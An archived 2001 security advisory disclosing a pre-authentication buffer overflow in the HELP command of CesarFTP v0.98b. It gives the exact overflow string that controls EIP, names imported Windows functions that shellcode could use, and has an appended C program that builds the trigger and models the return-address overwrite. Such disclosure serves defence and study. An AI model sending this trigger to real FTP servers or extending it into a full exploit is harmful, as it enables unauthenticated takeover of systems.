cesarFTP v0.98b 'HELP' buffer overflow

From: ByteRage (byterageat_private)
Date: Sat Jun 30 2001 - 02:36:21 PDT


    DESCRIPTION
    
    CesarFTP v0.98b is vulnerable to a buffer overflow when
    it receives the HELP command followed by a very long
    argument. The overflowed bytes reach the function's
    saved return address, so the attacker controls EIP.
    
    Example: sending the following Perl string (1978 filler
    bytes, then the four bytes that land in EIP, then a NUL
    that terminates the copy, then CRLF):
    
    "HELP " . ("A" x 1978) . "CCCC\x00\x0D\x0A" 
    
    reroutes SERVER.EXE's EIP to 0x43434343 ("CCCC"). HELP
    is accepted before authentication, so anyone who can
    reach the service can compromise the Win9x/NT/2000
    system without logging in.
    The only tricky part in writing an exploit is that
    SERVER.EXE doesn't have LoadLibraryA or GetProcAddress
    in its import table, so shellcode cannot use them to
    resolve arbitrary APIs; but there are enough other
    imported functions that give away enough power to take
    over the computer (registry functions, CreateDirectoryA,
    CreateFileA, ReadFile, WriteFile, ShellExecuteA, ...).
    I have not written an exploit and probably I never
    will :)
    
    VENDOR STATUS
    
    I have sent this advisory to <cesarftpat_private>
    
    greetz,
    [ByteRage] <byterageat_private> byterage.cjb.net
    
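The mechanics of the trigger above, as an added worked example in C (not ByteRage's code and not part of CesarFTP). It builds the same "HELP " + 1978 x 'A' + EIP + NUL + CRLF string and feeds the argument into a model of the vulnerable handler: a flat byte array in which the first 1978 bytes stand for the locals (including the undersized HELP buffer) and the next four bytes for the saved return address. The 1978 offset is the advisory's; the frame layout, the strcpy-style copy and the stand-in return address 0x00401234 are assumptions, since the real SERVER.EXE frame is not documented here. The model also shows what happens when the pad is too long (the filler itself becomes EIP) or too short (the return address is only partly overwritten), which is the check one does before trusting an offset.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Offset from the start of the HELP argument to the saved return address,
 * as reported in the advisory (1978 bytes of 'A' precede the "CCCC"). */
#define HELP_PAD_LEN 1978u

/* Bytes the model frame keeps beyond the saved return address.
 * Assumption: the real SERVER.EXE frame is not documented. */
#define MODEL_TAIL 16u
#define MODEL_FRAME_SIZE (HELP_PAD_LEN + 4u + MODEL_TAIL)

/* Wire length of a trigger with the given pad: "HELP " + pad + 4 + "\0\r\n". */
size_t trigger_length(size_t pad)
{
    return 5u + pad + 4u + 3u;
}

/* Build "HELP " + pad*'A' + eip + "\0\r\n" into out. Returns the length
 * written, or 0 if out is too small. eip is stored little-endian, as an x86
 * target pops it; it must not contain a 0x00 byte or the copy stops early. */
size_t build_help_trigger(unsigned char *out, size_t outlen, size_t pad, uint32_t eip)
{
    size_t need = trigger_length(pad);
    if (outlen < need)
        return 0;
    unsigned char *p = out;
    memcpy(p, "HELP ", 5);
    p += 5;
    memset(p, 'A', pad);
    p += pad;
    for (int i = 0; i < 4; i++)
        *p++ = (unsigned char)(eip >> (8 * i));
    *p++ = 0x00;   /* NUL: a strcpy-style copy stops here, so CR LF never land in the frame */
    *p++ = 0x0D;
    *p++ = 0x0A;
    return need;
}

/* Model of the vulnerable handler (assumed layout). Locals occupy the first
 * HELP_PAD_LEN bytes of the frame, the saved return address the next four.
 * arg is the C string after "HELP ". Returns the value that would be popped
 * into EIP when the handler returns. */
uint32_t model_handle_help(const char *arg)
{
    unsigned char frame[MODEL_FRAME_SIZE];
    const uint32_t legit = 0x00401234u;   /* stand-in for the real return address */

    memset(frame, 0, sizeof frame);
    for (int i = 0; i < 4; i++)
        frame[HELP_PAD_LEN + i] = (unsigned char)(legit >> (8 * i));

    /* The unchecked copy: strcpy semantics (up to and including the NUL),
     * bounded to the frame only so that the model itself stays memory-safe. */
    size_t n = strlen(arg) + 1;
    if (n > sizeof frame)
        n = sizeof frame;
    memcpy(frame, arg, n);

    uint32_t eip = 0;
    for (int i = 0; i < 4; i++)
        eip |= (uint32_t)frame[HELP_PAD_LEN + i] << (8 * i);
    return eip;
}

/* Build a trigger with the given pad and eip, run it through the model and
 * return the resulting EIP; 0 if the trigger could not be built. */
uint32_t eip_after_trigger(size_t pad, uint32_t eip)
{
    unsigned char pkt[4096];
    size_t n = build_help_trigger(pkt, sizeof pkt, pad, eip);
    if (n == 0)
        return 0;
    return model_handle_help((const char *)pkt + 5);
}

int main(void)
{
    unsigned char pkt[4096];
    size_t n = build_help_trigger(pkt, sizeof pkt, HELP_PAD_LEN, 0x43434343u);
    printf("trigger is %zu bytes; last 8:", n);
    for (size_t i = n - 8; i < n; i++)
        printf(" %02x", pkt[i]);
    printf("\npad %u: EIP = 0x%08x\n", HELP_PAD_LEN,
           eip_after_trigger(HELP_PAD_LEN, 0x43434343u));
    printf("pad %u: EIP = 0x%08x (too long: filler lands in EIP)\n", HELP_PAD_LEN + 4u,
           eip_after_trigger(HELP_PAD_LEN + 4u, 0x43434343u));
    printf("pad %u: EIP = 0x%08x (too short: partial overwrite)\n", HELP_PAD_LEN - 2u,
           eip_after_trigger(HELP_PAD_LEN - 2u, 0x43434343u));
    return 0;
}
```

The NUL after the four EIP bytes is what makes the trigger tidy: the copy stops exactly at the return address, nothing above it on the stack is disturbed, and the CR LF that ends the FTP line never enters the frame. The same constraint cuts the other way when choosing a real return address, which must be free of 0x00 bytes for a string copy to carry it through.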



    This archive was generated by hypermail 2b30 : Sun Jul 01 2001 - 23:04:39 PDT